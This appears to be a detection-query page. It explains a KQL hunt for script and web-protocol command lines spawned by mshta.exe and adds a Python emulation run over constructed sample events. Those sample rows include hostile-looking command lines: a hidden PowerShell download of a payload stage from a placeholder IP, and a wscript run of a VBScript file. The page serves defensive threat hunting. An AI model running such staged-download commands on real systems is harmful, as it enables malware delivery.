Query Details

MSHTA Executions

Query

Tags:

Query:
DeviceProcessEvents
| where InitiatingProcessFileName contains "mshta.exe"
    and ProcessCommandLine has_any ("javascript", "about", "vbscript", "http", "ftp")
References:

Explanation

This query looks for process-creation events in which mshta.exe is the parent process and the child's command line carries script- or web-protocol-related terms. Step by step:

  1. Data Source: It reads DeviceProcessEvents, the Microsoft Defender for Endpoint advanced hunting table that records process creations together with the initiating (parent) process.
  2. Filter by Parent Process: It keeps rows where InitiatingProcessFileName contains "mshta.exe", i.e. the new process was spawned by mshta.exe, the Microsoft HTML Application host that runs .hta files and inline script. contains is a case-insensitive substring match, so MSHTA.EXE matches as well.
  3. Filter by Command Line: It then keeps only rows where ProcessCommandLine, the command line of the spawned child process, has any of the terms "javascript", "about", "vbscript", "http" or "ftp". has_any is a case-insensitive whole-term match, so these strings do not match when they are embedded inside a longer token.

In summary, the query surfaces processes that mshta.exe launched with script-related or web-protocol terms on their command line, which is worth reviewing because mshta.exe is a commonly abused living-off-the-land binary (MITRE ATT&CK T1218.005). Note that the filter is on the initiating (parent) process: an mshta.exe started directly with an inline javascript: or vbscript: URI is not matched by this query and would need a separate check on FileName and ProcessCommandLine of mshta.exe itself.
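To make the query's matching semantics concrete, here is an added Python example (not code from the original page or its author) that emulates the two KQL operators over a handful of constructed DeviceProcessEvents rows. The rows, host paths and the 198.51.100.7 address are made up for illustration. The term tokenizer is an approximation of Kusto term extraction (runs of alphanumerics, case-insensitive), which is enough for the single-word terms this query uses. It also goes one step beyond the page's query with run_query_self, which checks mshta.exe itself rather than its children, to show the gap noted above.

```python
import re

# Constructed sample rows shaped like DeviceProcessEvents (not real telemetry).
SAMPLE_EVENTS = [
    # 1: mshta.exe launched PowerShell with an http URL on the command line -> match
    {"InitiatingProcessFileName": "mshta.exe", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -c \"iwr http://198.51.100.7/stage\""},
    # 2: mshta.exe launched a child with none of the terms -> no match
    {"InitiatingProcessFileName": "mshta.exe", "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c echo done"},
    # 3: mshta.exe itself started by explorer.exe with inline JavaScript.
    #    The page's query filters on the parent name, so this row is missed.
    {"InitiatingProcessFileName": "explorer.exe", "FileName": "mshta.exe",
     "ProcessCommandLine": "mshta.exe javascript:close()"},
    # 4: parent name in upper case; contains/has_any are case-insensitive -> match
    {"InitiatingProcessFileName": "MSHTA.EXE", "FileName": "wscript.exe",
     "ProcessCommandLine": "wscript.exe //E:vbscript C:\\Users\\Public\\run.txt"},
    # 5: "about" only appears inside a longer term; has_any needs a whole term -> no match
    {"InitiatingProcessFileName": "mshta.exe", "FileName": "readaboutblank.exe",
     "ProcessCommandLine": "C:\\tools\\readaboutblank.exe"},
]

SUSPICIOUS_TERMS = ("javascript", "about", "vbscript", "http", "ftp")

# Approximation of Kusto term extraction: lower-cased runs of alphanumerics.
TERM_RE = re.compile(r"[a-z0-9]+")


def kql_terms(value):
    """Split a string into the set of terms that `has`/`has_any` match against."""
    return set(TERM_RE.findall(value.lower()))


def kql_contains(value, needle):
    """KQL `contains`: case-insensitive substring match."""
    return needle.lower() in value.lower()


def kql_has_any(value, needles):
    """KQL `has_any`: true if any needle occurs as a whole term, case-insensitively."""
    found = kql_terms(value)
    return any(n.lower() in found for n in needles)


def run_query(events):
    """The page's query: mshta.exe is the parent and the child's command line has a term."""
    return [e for e in events
            if kql_contains(e["InitiatingProcessFileName"], "mshta.exe")
            and kql_has_any(e["ProcessCommandLine"], SUSPICIOUS_TERMS)]


def run_query_self(events):
    """Companion check (not on the page): mshta.exe itself launched with a suspicious term."""
    return [e for e in events
            if e["FileName"].lower() == "mshta.exe"
            and kql_has_any(e["ProcessCommandLine"], SUSPICIOUS_TERMS)]


if __name__ == "__main__":
    for label, hits in (("parent filter", run_query(SAMPLE_EVENTS)),
                        ("self filter", run_query_self(SAMPLE_EVENTS))):
        print(label)
        for e in hits:
            print("  ", e["InitiatingProcessFileName"], "->", e["ProcessCommandLine"])
```

Rows 1 and 4 are the only hits for the page's query; row 3 shows why a complementary check on FileName is useful, and row 5 shows the difference between has_any and contains on the same substring.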

Details


Ali Hussein

Released: December 4, 2023

Tables

DeviceProcessEvents

Keywords

DeviceProcessEvents

Operators

|, where, contains, and, has_any
